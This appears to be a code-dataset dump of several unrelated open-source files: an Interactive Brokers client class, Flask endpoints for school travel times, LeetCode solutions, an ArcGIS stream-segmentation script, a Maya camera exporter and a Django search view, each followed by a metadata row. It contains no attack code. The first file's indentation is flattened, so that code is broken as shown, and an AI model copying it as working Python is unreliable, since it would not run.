IB_IS_ERROR = [200]
class ibClient(object):
"""
Client specific to interactive brokers
We inherit from this to do interesting stuff, so this base class just offers error handling and get time
"""
def __init__(self, ibconnection: connectionIB, log: logger=logtoscreen("ibClient")):
# means our first call won't be throttled for pacing
self.last_historic_price_calltime = (
datetime.datetime.now() -
datetime.timedelta(
seconds=_PACING_PERIOD_SECONDS))
# Add error handler
ibconnection.ib.errorEvent += self.error_handler
        self._ib_connection = ibconnection
self._log = log
@property
def ib_connection(self) -> connectionIB:
        return self._ib_connection
@property
def ib(self) -> IB:
return self.ib_connection.ib
@property
def client_id(self) -> int:
return self.ib.client.clientId
@property
def log(self):
return self._log
def error_handler(self, reqid: int, error_code: int, error_string: str, contract: Contract):
"""
Error handler called from server
Needs to be attached to ib connection
:param reqid: IB reqid
:param error_code: IB error code
:param error_string: IB error string
:param contract: IB contract or None
:return: success
"""
if contract is None:
contract_str = ""
else:
contract_str = " (%s/%s)" % (
contract.symbol,
contract.lastTradeDateOrContractMonth,
)
msg = "Reqid %d: %d %s %s" % (
reqid, error_code, error_string, contract_str)
iserror = error_code in IB_IS_ERROR
if iserror:
            # Serious error that requires some action
myerror_type = IB_ERROR_TYPES.get(error_code, "generic")
self.broker_error(msg, myerror_type)
else:
# just a warning / general message
self.broker_message(msg)
def broker_error(self, msg, myerror_type):
self.log.warn(msg)
def broker_message(self, msg):
self.log.msg(msg)
def refresh(self):
self.ib.sleep(0.00001)
def get_broker_time_local_tz(self) -> datetime.datetime:
ib_time = self.ib.reqCurrentTime()
local_ib_time_with_tz = ib_time.astimezone(tz.tzlocal())
local_ib_time = strip_timezone_fromdatetime(local_ib_time_with_tz)
return local_ib_time
| gpl-3.0 | 4,736,020,536,605,287,000 | 25.478261 | 108 | 0.625616 | false | 3.722494 | false | false | false |
open-city/school-admissions | api/endpoints.py | 1 | 3229 | from flask import Blueprint, make_response, request, jsonify, \
session as flask_session
import json
from sqlalchemy import Table, func, or_
from api.database import session, engine, Base
from api.models import SourceDest
endpoints = Blueprint('endpoints', __name__)
@endpoints.route('/matrix/')
def matrix():
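    # Return the ten high schools with the shortest in-vehicle transit time
    # from the CMAP travel zone containing the given start coordinate.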
start = request.args.get('start')
resp = {
'meta': {
'status': 'ok',
'message': ''
}
}
if not start:
resp['meta']['status'] = 'error'
resp['meta']['message'] = 'start is required'
else:
start = start.split(',')
zone_table = Table('zone09_cmap_2009', Base.metadata,
autoload=True, autoload_with=engine, keep_existing=True)
school_table = Table('cps_school_locations_sy1415', Base.metadata,
autoload=True, autoload_with=engine, keep_existing=True)
zone_query = session.query(zone_table.c.zone09)\
.filter(func.st_contains(zone_table.c.geom,
func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)),
)
start_zone = [i[0] for i in zone_query.all()][0]
school_query = session.query(SourceDest, school_table.c.schoolname, school_table.c.schooladdr)\
.filter(SourceDest.dest == school_table.c.zone)\
.filter(SourceDest.source == start_zone)\
.filter(school_table.c.school_category == 'HS')\
.order_by(SourceDest.in_vehicle_time)\
.limit(10).all()
resp['objects'] = []
for source_dest, name, addr in school_query:
d = source_dest.as_dict()
d['school_name'] = name
d['address'] = addr
resp['objects'].append(d)
resp = make_response(json.dumps(resp))
resp.headers['Content-Type'] = 'application/json'
return resp
@endpoints.route('/transit-time/')
def transit_time():
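    # Look up the zone-to-zone travel time between the CMAP travel zones
    # containing the start and end coordinates.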
start = request.args.get('start')
end = request.args.get('end')
resp = {
'meta': {
'status': 'ok',
'message': ''
}
}
if not start or not end:
resp['meta']['status'] = 'error'
resp['meta']['message'] = 'start and end are required'
else:
start = start.split(',')
end = end.split(',')
zone_table = Table('zone09_cmap_2009', Base.metadata,
autoload=True, autoload_with=engine, keep_existing=True)
query = session.query(zone_table.c.zone09)\
.filter(or_(
func.st_contains(zone_table.c.geom,
func.st_pointfromtext('POINT(' + str(start[1]) + ' ' + str(start[0]) + ')', 4326)),
func.st_contains(zone_table.c.geom,
func.st_pointfromtext('POINT(' + str(end[1]) + ' ' + str(end[0]) + ')', 4326))
))
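        # NOTE: assumes start and end fall in two distinct zones and that the
        # rows come back in (start, end) order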
start_zone, end_zone = [i[0] for i in query.all()]
travel_time = session.query(SourceDest)\
.filter(SourceDest.source == start_zone)\
.filter(SourceDest.dest == end_zone).first()
resp['travel_time'] = travel_time.as_dict()
resp = make_response(json.dumps(resp))
resp.headers['Content-Type'] = 'application/json'
return resp
| mit | 6,371,344,603,827,604,000 | 38.864198 | 103 | 0.560545 | false | 3.567956 | false | false | false |
Shuailong/Leetcode | solutions/maximum-size-subarray-sum-equals-k.py | 1 | 2057 | #!/usr/bin/env python
# encoding: utf-8
"""
maximum-size-subarray-sum-equals-k.py
Created by Shuailong on 2016-01-06.
https://leetcode.com/problems/maximum-size-subarray-sum-equals-k/.
"""
'''Not solved yet.'''
class Solution(object):
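    # Prefix sums plus a quadratic scan over (start, end) pairs; the brute-force
    # attempts below (Solution1/Solution2) are slower and hit TLE. An O(n) variant
    # would remember the earliest index of each prefix sum in a dict instead.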
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
n = len(nums)
sums = [0]*(n+1)
for i in range(1, n+1):
sums[i] = sums[i-1] + nums[i-1]
res = 0
for i in range(n):
for j in range(n-1,i-1+res,-1):
if sums[j] - sums[i] == k and j - i > res:
res = j - i
return res
class Solution2(object):
'''TLE'''
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
n = len(nums)
max_length = 0
for start_index in range(n):
this_length = 0
subsum = 0
j = start_index
while j < n:
subsum += nums[j]
if subsum == k:
this_length = j - start_index + 1
j += 1
if this_length > max_length:
max_length = this_length
return max_length
class Solution1(object):
'''TLE'''
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
n = len(nums)
for length in range(n,0,-1):
for start_index in range(n-length+1):
subsum = 0
for i in range(length):
subsum += nums[start_index+i]
if subsum == k:
return length
return 0
def main():
solution = Solution()
nums = [1, -1, 5, -2, 3]
k = 3
print solution.maxSubArrayLen(nums,k)
nums = [-2, -1, 2, 1]
k = 1
print solution.maxSubArrayLen(nums,k)
if __name__ == '__main__':
main()
| mit | -1,179,304,352,611,225,900 | 20.893617 | 66 | 0.450656 | false | 3.451342 | false | false | false |
rmichie/TTools | Step1_SegmentStream.py | 1 | 14902 | ########################################################################
# TTools
# Step 1: Create Stream Nodes version 0.953
# Ryan Michie
# This script will take an input polyline feature with unique
# stream IDs and generate evenly spaced points along each
# unique stream ID polyline at a user defined spacing measured from
# the downstream endpoint. The script can also check the digitized
# direction to determine the downstream end.
# INPUTS
# 0: Stream centerline polyline (streamline_fc)
# 1: Unique StreamID field (sid_field)
# 2: Spacing between nodes in meters (node_dx)
# 3: Outputs a continuous stream km regardless of
#    the unique values in the stream ID field (cont_stream_km)
# 4: OPTIONAL True/False flag to check if the stream was digitized in
#    the correct direction (checkDirection)
# 5: OPTIONAL Elevation Raster used in the check stream
#    direction procedure (z_raster)
# 6: Path/Name of output node feature class (nodes_fc)
# OUTPUTS
# point feature class
# The output point feature class has the following fields:
# 0: NODE_ID - unique node ID
# 1: STREAM_ID - field matching a unique polyline ID field identified
#    by the user
# 2: STREAM_KM - double measured from the downstream end of the stream
#    for each STREAM_ID
# 3: LENGTH - length in meters of the stream segment represented by each node
# 4: LONGITUDE - decimal degrees X coordinate of the node using GCS_WGS_1984 datum.
# 5: LATITUDE - decimal degrees Y coordinate of the node using GCS_WGS_1984 datum.
# 6: ASPECT - stream aspect in the direction of flow
# Future Updates
# eliminate arcpy and use gdal for reading/writing feature class data
# This version is for manual starts from within python.
# This script requires Python 2.6 and ArcGIS 10.1 or higher to run.
########################################################################
# Import system modules
from __future__ import division, print_function
import sys
import os
import gc
import time
import traceback
from datetime import timedelta
from math import ceil, atan2, degrees
from operator import itemgetter
import arcpy
from arcpy import env
env.overwriteOutput = True
# ----------------------------------------------------------------------
# Start Fill in Data
streamline_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_streams_major"
sid_field = "NAME"
node_dx = 50
cont_stream_km = True
checkDirection = True
z_raster = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_be_m_mosaic"
nodes_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_stream_nodes"
# End Fill in Data
# ----------------------------------------------------------------------
# Parameter fields for python toolbox
#streamline_fc = parameters[0].valueAsText
#sid_field = parameters[1].valueAsText
#node_dx = parameters[2].valueAsText
#cont_stream_km = parameters[3].valueAsText
#checkDirection = parameters[4].valueAsText
#z_raster = = parameters[5].valueAsText
#nodes_fc = parameters[6].valueAsText
#streamline_fc = arcpy.GetParameterAsText(0)
#sid_field = arcpy.GetParameterAsText(1)
#node_dx = arcpy.GetParameterAsText(2)
#checkDirection = arcpy.GetParameterAsText(3)
#z_raster = arcpy.GetParameterAsText(4)
#nodes_fc = arcpy.GetParameterAsText(5)
def create_node_list(streamline_fc, checkDirection, z_raster):
"""Reads an input stream centerline file and returns the NODE ID,
STREAM ID, and X/Y coordinates as a list"""
nodeList = []
incursorFields = ["SHAPE@","SHAPE@LENGTH", sid_field]
nodeID = 0
# Determine input projection and spatial units
proj = arcpy.Describe(streamline_fc).spatialReference
con_from_m = from_meters_con(streamline_fc)
con_to_m = to_meters_con(streamline_fc)
# Pull the stream IDs into a list
sid_list = []
with arcpy.da.SearchCursor(streamline_fc, sid_field,"",proj) as Inrows:
for row in Inrows:
sid_list.append(row[0])
# Check for duplicate stream IDs
dups = list(set([i for i in sid_list if sid_list.count(i) > 1]))
if dups:
sys.exit("There are duplicate stream IDs in your input stream"+
"feature class."+
"\nHere are the duplicates: \n"+
"{0}".format(dups))
# Now create the nodes. I'm pulling the fc data twice because on
# speed tests it is faster compared to saving all the incursorFields
# to a list and iterating over the list
print("Creating Nodes")
with arcpy.da.SearchCursor(streamline_fc, incursorFields,"",proj) as Inrows:
for row in Inrows:
lineLength = row[1] # These units are in the units of projection
numNodes = int(lineLength * con_to_m / node_dx)
nodes = range(0,numNodes+1)
mid = range(0,numNodes)
if checkDirection is True:
flip = check_stream_direction(row[0], z_raster, row[2])
else:
flip = 1
arcpy.SetProgressor("step", "Creating Nodes", 0, numNodes+1, 1)
# list of percentage of feature length to traverse
positions = [n * node_dx * con_from_m / lineLength for n in nodes]
segment_length = [node_dx] * numNodes + [lineLength * con_to_m % node_dx]
mid_distance = node_dx * con_from_m / lineLength
if mid_distance > 1:
# this situation occurs when the stream < node_dx.
# The azimith is calculated for the entire stream line.
mid_distance = 1
i = 0
for position in positions:
node = row[0].positionAlongLine(abs(flip - position),
True).centroid
# Get the coordinates at the up/down midway point along
# the line between nodes and calculate the stream azimuth
if position == 0.0:
mid_up = row[0].positionAlongLine(
abs(flip - (position + mid_distance)),True).centroid
mid_down = node
elif 0.0 < position + mid_distance < 1:
mid_up = row[0].positionAlongLine(
abs(flip - (position + mid_distance)),True).centroid
mid_down = row[0].positionAlongLine(
abs(flip - (position - mid_distance)),True).centroid
else:
mid_up = node
mid_down = row[0].positionAlongLine(
abs(flip - (position - mid_distance)),True).centroid
stream_azimuth = degrees(atan2((mid_down.X - mid_up.X),
(mid_down.Y - mid_up.Y)))
if stream_azimuth < 0:
stream_azimuth = stream_azimuth + 360
# list of "NODE_ID","STREAM_ID". "STREAM_KM", "LENGTH",
# "POINT_X","POINT_Y", "ASPECT", "SHAPE@X", "SHAPE@Y"
nodeList.append([nodeID, row[2],
float(position * lineLength * con_to_m /1000),
segment_length[i],
node.X, node.Y, stream_azimuth, node.X, node.Y])
nodeID = nodeID + 1
i = i + 1
arcpy.SetProgressorPosition()
arcpy.ResetProgressor()
return(nodeList)
def create_nodes_fc(nodeList, nodes_fc, sid_field, proj):
"""Create the output point feature class using
the data from the nodes list"""
#arcpy.AddMessage("Exporting Data")
print("Exporting Data")
# Determine Stream ID field properties
sid_type = arcpy.ListFields(streamline_fc,sid_field)[0].type
sid_precision = arcpy.ListFields(streamline_fc,sid_field)[0].precision
sid_scale = arcpy.ListFields(streamline_fc,sid_field)[0].scale
sid_length = arcpy.ListFields(streamline_fc,sid_field)[0].length
#Create an empty output with the same projection as the input polyline
cursorfields = ["NODE_ID",
"STREAM_ID",
"STREAM_KM",
"LENGTH",
"LONGITUDE",
"LATITUDE",
"ASPECT"]
arcpy.CreateFeatureclass_management(os.path.dirname(nodes_fc),
os.path.basename(nodes_fc),
"POINT","","DISABLED","DISABLED",proj)
# Add attribute fields
for f in cursorfields:
if f == "STREAM_ID":
arcpy.AddField_management(nodes_fc, f, sid_type, sid_precision,
sid_scale, sid_length, "",
"NULLABLE", "NON_REQUIRED")
else:
arcpy.AddField_management(nodes_fc, f, "DOUBLE", "", "", "",
"", "NULLABLE", "NON_REQUIRED")
with arcpy.da.InsertCursor(nodes_fc, cursorfields + ["SHAPE@X","SHAPE@Y"]) as cursor:
for row in nodeList:
cursor.insertRow(row)
#Change X/Y from input spatial units to decimal degrees
proj_dd = arcpy.SpatialReference(4326) # GCS_WGS_1984
with arcpy.da.UpdateCursor(nodes_fc,["SHAPE@X","SHAPE@Y","LONGITUDE",
"LATITUDE"],"",proj_dd) as cursor:
for row in cursor:
row[2] = row[0] # LONGITUDE
row[3] = row[1] # LATITUDE
cursor.updateRow(row)
def check_stream_direction(stream, z_raster, streamID):
"""Samples the elevation raster at both ends of the stream
polyline to see which is the downstream end and returns flip = 1
if the stream km need to be reversed"""
down = stream.positionAlongLine(0,True).centroid
up = stream.positionAlongLine(1,True).centroid
# when a single raster cell is sampled it is a little faster to
# use arcpy compared to converting to an array and then sampling.
# I left the code just in case though
z_down = float(arcpy.GetCellValue_management (z_raster, str(down.X)+ " "+ str(down.Y),1).getOutput(0))
z_up = float(arcpy.GetCellValue_management (z_raster, str(up.X) + " "+ str(up.Y),1).getOutput(0))
#z_down = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(down.X, down.Y), 1, 1, -9999)[0][0]
#z_up = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(up.X, up.Y), 1, 1, -9999)[0][0]
if z_down <= z_up or z_down == -9999 or z_up == -9999:
# do not reverse stream km
flip = 0
else:
print("Reversing {0}".format(streamID))
# reversed stream km
flip = 1
return flip
def to_meters_con(inFeature):
"""Returns the conversion factor to get from the
input spatial units to meters"""
try:
con_to_m = arcpy.Describe(inFeature).SpatialReference.metersPerUnit
except:
arcpy.AddError("{0} has a coordinate system ".format(inFeature)+
"that is not projected or not recognized. "+
"Use a projected coordinate system "
"preferably in linear units of feet or meters.")
sys.exit("Coordinate system is not projected or not recognized. "+
"Use a projected coordinate system, preferably in linear "+
"units of feet or meters.")
return con_to_m
def from_meters_con(inFeature):
"""Returns the conversion factor to get from meters to the
spatial units of the input feature class"""
try:
con_from_m = 1 / arcpy.Describe(inFeature).SpatialReference.metersPerUnit
except:
arcpy.AddError("{0} has a coordinate system ".format(inFeature)+
"that is not projected or not recognized. "+
"Use a projected coordinate system "
"preferably in linear units of feet or meters.")
sys.exit("Coordinate system is not projected or not recognized. "+
"Use a projected coordinate system, preferably in linear "+
"units of feet or meters.")
return con_from_m
#enable garbage collection
gc.enable()
try:
#keeping track of time
startTime= time.time()
# Check if the output exists
if arcpy.Exists(nodes_fc):
arcpy.AddError("\nThis output already exists: \n" +
"{0}\n".format(nodes_fc) +
"Please rename your output.")
sys.exit("This output already exists: \n" +
"{0}\n".format(nodes_fc) +
"Please rename your output.")
    # Get the spatial projection of the input stream lines
proj = arcpy.Describe(streamline_fc).SpatialReference
if checkDirection is True:
proj_ele = arcpy.Describe(z_raster).spatialReference
        # Check to make sure the elevation raster and input
# streams are in the same projection.
if proj.name != proj_ele.name:
arcpy.AddError("{0} and {1} do not ".format(nodes_fc,z_raster)+
"have the same projection."+
"Please reproject your data.")
sys.exit("Input stream line and elevation raster do not have "
"the same projection. Please reproject your data.")
# Create the stream nodes and return them as a list
nodeList = create_node_list(streamline_fc, checkDirection, z_raster)
if cont_stream_km:
#sort the list by stream ID and stream km
nodeList = sorted(nodeList, key=itemgetter(1, 2))
skm = 0.0
for i in range(0, len(nodeList)):
nodeList[i][2] = skm
skm = skm + (node_dx * 0.001)
# re sort the list by stream km (with downstream end at the top)
nodeList = sorted(nodeList, key=itemgetter(2), reverse=True)
else:
#sort the list by stream ID and then stream km (downstream end at the top)
nodeList = sorted(nodeList, key=itemgetter(1,2), reverse=True)
# Create the output node feature class with the nodes list
create_nodes_fc(nodeList, nodes_fc, sid_field, proj)
gc.collect()
endTime = time.time()
elapsedmin = ceil(((endTime - startTime) / 60)* 10)/10
mspernode = timedelta(seconds=(endTime - startTime) / len(nodeList)).microseconds
print("Process Complete in {0} minutes. {1} microseconds per node".format(elapsedmin, mspernode))
#arcpy.AddMessage("Process Complete in %s minutes. %s microseconds per node" % (elapsedmin, mspernode))
# For arctool errors
except arcpy.ExecuteError:
msgs = arcpy.GetMessages(2)
#arcpy.AddError(msgs)
print(msgs)
# For other errors
except:
tbinfo = traceback.format_exc()
pymsg = "PYTHON ERRORS:\n" + tbinfo + "\nError Info:\n" +str(sys.exc_info()[1])
msgs = "ArcPy ERRORS:\n" + arcpy.GetMessages(2) + "\n"
#arcpy.AddError(pymsg)
#arcpy.AddError(msgs)
print(pymsg)
print(msgs) | gpl-3.0 | 3,051,930,570,020,387,300 | 40.628492 | 108 | 0.593679 | false | 3.930889 | false | false | false |
westernx/mayatools | mayatools/camera/exporterui.py | 1 | 6399 | from __future__ import absolute_import
from uitools.qt import QtCore, QtGui, Qt
from maya import cmds, mel
import sgpublish.exporter.ui.publish.maya
import sgpublish.exporter.ui.tabwidget
import sgpublish.exporter.ui.workarea
import sgpublish.uiutils
from sgpublish.exporter.ui.publish.generic import PublishSafetyError
from .exporter import CameraExporter, get_nodes_to_export
class Dialog(QtGui.QDialog):
def __init__(self):
super(Dialog, self).__init__()
self._setup_ui()
def _setup_ui(self):
self.setWindowTitle("Camera Export")
self.setLayout(QtGui.QVBoxLayout())
self.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
camera_row = QtGui.QHBoxLayout()
camera_row.setSpacing(2)
self.layout().addLayout(camera_row)
self._cameras = QtGui.QComboBox()
camera_row.addWidget(self._cameras)
self._cameras.activated.connect(self._on_cameras_changed)
button = QtGui.QPushButton("Reload")
button.clicked.connect(self._on_reload)
button.setFixedHeight(self._cameras.sizeHint().height())
button.setFixedWidth(button.sizeHint().width())
camera_row.addWidget(button)
box = QtGui.QGroupBox("Manifest Summary")
self.layout().addWidget(box)
box.setLayout(QtGui.QVBoxLayout())
self._summary = QtGui.QLabel("Select a camera.")
box.layout().addWidget(self._summary)
box.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
box = QtGui.QGroupBox("Options")
self.layout().addWidget(box)
box.setLayout(QtGui.QVBoxLayout())
self._worldSpaceBox = QtGui.QCheckBox("Bake to World Space (for debugging)")
box.layout().addWidget(self._worldSpaceBox)
self._exporter = CameraExporter()
self._exporter_widget = sgpublish.exporter.ui.tabwidget.Widget()
self.layout().addWidget(self._exporter_widget)
# SGPublishes.
tab = sgpublish.exporter.ui.publish.maya.Widget(self._exporter)
tab.beforeScreenshot.connect(lambda *args: self.hide())
tab.afterScreenshot.connect(lambda *args: self.show())
self._exporter_widget.addTab(tab, "Publish to Shotgun")
# Work area.
tab = sgpublish.exporter.ui.workarea.Widget(self._exporter, {
'directory': 'scenes/camera',
'sub_directory': '',
'extension': '.ma',
'warning': self._warning,
'error': self._warning,
})
self._exporter_widget.addTab(tab, "Export to Work Area")
button_row = QtGui.QHBoxLayout()
button_row.addStretch()
self.layout().addLayout(button_row)
self._button = button = QtGui.QPushButton("Export")
button.clicked.connect(self._on_export)
button_row.addWidget(button)
self._populate_cameras()
def _on_reload(self, *args):
self._populate_cameras()
def _populate_cameras(self):
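        # Rebuild the camera list, keeping the previously chosen camera selected
        # (or defaulting to a camera transform currently selected in the scene).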
previous = str(self._cameras.currentText())
selection = set(cmds.ls(sl=True, type='transform') or ())
self._cameras.clear()
for camera in cmds.ls(type="camera"):
transform = cmds.listRelatives(camera, parent=True, fullPath=True)[0]
self._cameras.addItem(transform, (transform, camera))
if (previous and previous == transform) or (not previous and transform in selection):
self._cameras.setCurrentIndex(self._cameras.count() - 1)
self._update_status()
def _on_cameras_changed(self, *args):
self._update_status()
def _update_status(self):
transform = str(self._cameras.currentText())
counts = {}
for node in get_nodes_to_export(transform):
type_ = cmds.nodeType(node)
counts[type_] = counts.get(type_, 0) + 1
self._summary.setText('\n'.join('%dx %s' % (c, n) for n, c in sorted(counts.iteritems())))
def _on_export(self, *args):
# Other tools don't like cameras named the same as their transform,
# so this is a good place to warn about it.
transform, camera = self._cameras.itemData(self._cameras.currentIndex()).toPyObject()
transform_name = transform.rsplit('|', 1)[-1]
camera_name = camera.rsplit('|', 1)[-1]
if transform_name == camera_name:
res = QtGui.QMessageBox.warning(self, "Camera Name Collision",
"The selected camera and its transform have the same name, "
"which can cause issues with other tools.\n\nContinue anyways?",
"Abort", "Continue")
if not res:
return
try:
publisher = self._exporter_widget.export(
camera=camera,
bake_to_world_space=self._worldSpaceBox.isChecked()
)
except PublishSafetyError:
return
if publisher:
sgpublish.uiutils.announce_publish_success(publisher)
self.close()
def _warning(self, message):
cmds.warning(message)
def _error(self, message):
cmds.confirmDialog(title='Scene Name Error', message=message, icon='critical')
cmds.error(message)
def __before_reload__():
if dialog:
dialog.close()
dialog = None
def run():
global dialog
if dialog:
dialog.close()
# Be cautious if the scene was never saved
filename = cmds.file(query=True, sceneName=True)
if not filename:
res = QtGui.QMessageBox.warning(None, 'Unsaved Scene', 'This scene has not beed saved. Continue anyways?',
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,
QtGui.QMessageBox.No
)
if res & QtGui.QMessageBox.No:
return
workspace = cmds.workspace(q=True, rootDirectory=True)
if filename and not filename.startswith(workspace):
res = QtGui.QMessageBox.warning(None, 'Mismatched Workspace', 'This scene is not from the current workspace. Continue anyways?',
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,
QtGui.QMessageBox.No
)
if res & QtGui.QMessageBox.No:
return
dialog = Dialog()
dialog.show()
| bsd-3-clause | 3,548,856,518,298,732,000 | 34.159341 | 136 | 0.609783 | false | 4.128387 | false | false | false |
uclouvain/osis | program_management/views/search.py | 1 | 5873 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2021 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import itertools
from collections import OrderedDict
from dal import autocomplete
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from django.shortcuts import get_object_or_404
from django.utils.html import format_html
from django.utils.translation import gettext_lazy as _, get_language
from django_filters.views import FilterView
from base.business.education_group import ORDER_COL, ORDER_DIRECTION, create_xls_administrative_data
from program_management.business.xls_customized import create_customized_xls, TRAINING_LIST_CUSTOMIZABLE_PARAMETERS
from base.forms.search.search_form import get_research_criteria
from base.models.academic_year import starting_academic_year
from base.models.education_group_type import EducationGroupType
from base.models.enums import education_group_categories
from base.models.person import Person
from base.utils.cache import CacheFilterMixin
from base.utils.search import SearchMixin, RenderToExcel
from education_group.models.group_year import GroupYear
from program_management.api.serializers.education_group import EducationGroupSerializer
from program_management.forms.education_groups import GroupFilter
def _get_filter(form):
return OrderedDict(itertools.chain(get_research_criteria(form)))
def _create_xls_administrative_data(view_obj, context, **response_kwargs):
user = view_obj.request.user
egys = context["filter"].qs
filters = _get_filter(context["form"])
# FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property
order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'),
ORDER_DIRECTION: view_obj.request.GET.get('xls_order')}
return create_xls_administrative_data(user, egys, filters, order, get_language())
def _create_xls_customized(view_obj, context, **response_kwargs):
user = view_obj.request.user
egys = context["filter"].qs
filters = _get_filter(context["form"])
# FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property
order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'),
ORDER_DIRECTION: view_obj.request.GET.get('xls_order')}
return create_customized_xls(user, egys, filters, order, _get_xls_parameters(view_obj))
def _get_xls_parameters(view_obj):
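    # Collect the optional, user-ticked columns to include in the customized XLS export.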
other_params = []
for parameter in TRAINING_LIST_CUSTOMIZABLE_PARAMETERS:
if view_obj.request.GET.get(parameter) == 'true':
other_params.append(parameter)
return other_params
@RenderToExcel("xls_administrative", _create_xls_administrative_data)
@RenderToExcel("xls_customized", _create_xls_customized)
class EducationGroupSearch(LoginRequiredMixin, PermissionRequiredMixin, CacheFilterMixin, SearchMixin, FilterView):
model = GroupYear
template_name = "search.html"
raise_exception = False
filterset_class = GroupFilter
permission_required = 'base.view_educationgroup'
serializer_class = EducationGroupSerializer
cache_search = True
cache_exclude_params = ['xls_status']
def get_context_data(self, **kwargs):
person = get_object_or_404(Person, user=self.request.user)
context = super().get_context_data(**kwargs)
starting_ac = starting_academic_year()
if context["paginator"].count == 0 and self.request.GET:
messages.add_message(self.request, messages.WARNING, _('No result!'))
context.update({
'person': person,
'form': context["filter"].form,
'object_list_count': context["paginator"].count,
'current_academic_year': starting_ac,
'items_per_page': context["paginator"].per_page,
'enums': education_group_categories,
})
return context
class EducationGroupTypeAutoComplete(LoginRequiredMixin, autocomplete.Select2QuerySetView):
def get_queryset(self):
if not self.request.user.is_authenticated:
return EducationGroupType.objects.none()
qs = EducationGroupType.objects.all()
category = self.forwarded.get('category', None)
if category:
qs = qs.filter(category=category)
if self.q:
# Filtering must be done in python because translated value.
ids_to_keep = {result.pk for result in qs if self.q.lower() in result.get_name_display().lower()}
qs = qs.filter(id__in=ids_to_keep)
qs = qs.order_by_translated_name()
return qs
def get_result_label(self, result):
return format_html('{}', result.get_name_display())
| agpl-3.0 | 3,858,530,714,304,342,000 | 43.150376 | 115 | 0.701635 | false | 3.858081 | false | false | false |